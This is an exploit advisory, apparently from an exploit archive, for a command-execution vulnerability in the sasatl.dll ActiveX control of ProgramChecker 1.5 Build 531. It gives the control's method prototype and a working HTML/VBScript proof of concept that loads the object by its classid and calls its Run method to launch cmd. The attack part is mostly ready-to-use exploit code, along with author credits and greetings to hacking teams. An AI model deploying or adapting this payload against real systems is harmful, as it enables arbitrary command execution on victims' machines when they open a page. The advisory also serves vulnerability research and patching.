ProgramChecker version 1.5 Build 531 suffers from an Active-X related command execution vulnerability.
82c25df9a2bebc070635dd0498a8741540046d1466df33e20f87b0fc1b7ac7b1
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""" :::::: :: :: :: :: :: :::: """
""" :: :: :: :: :::::: .. :::: :: """
""" ::::: ::: ::::: :: :: :: :: :: :::: """
""" :: :: :: :: : :: :: :: :: :: :: """
""" :::::: :: :: ::::: :: :::::: :: :: :::: rs.ir """
""" :: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Anti-Security Research Team & Security Institute
#[+] Bug : ProgramChecker 1.5 Bulid 531 (sasatl.dll) ActiveX Command Execution
#[+] program Download : http://www.programchecker.com/
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7
#[+] web site: Expl0iters.ir * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member
# Part Expl0it & Bug Codes ( Poc ) :
------------------------------------
targetFile = "C:\Program Files\Zenturi\ProgramChecker\sasatl.dll"
prototype = "Sub Run ( ByVal hwnd As Long , ByRef lResult As Long )"
memberName = "Run"
progid = "TRATLLib.Options"
argCount = 2
------------------------------------
<html>
<object classid='clsid:DD50A655-10FB-11D2-A22B-00104B27F81B' id='expl' ></object>
<script language='vbscript'>
expl.Run "cmd" ,0
</script>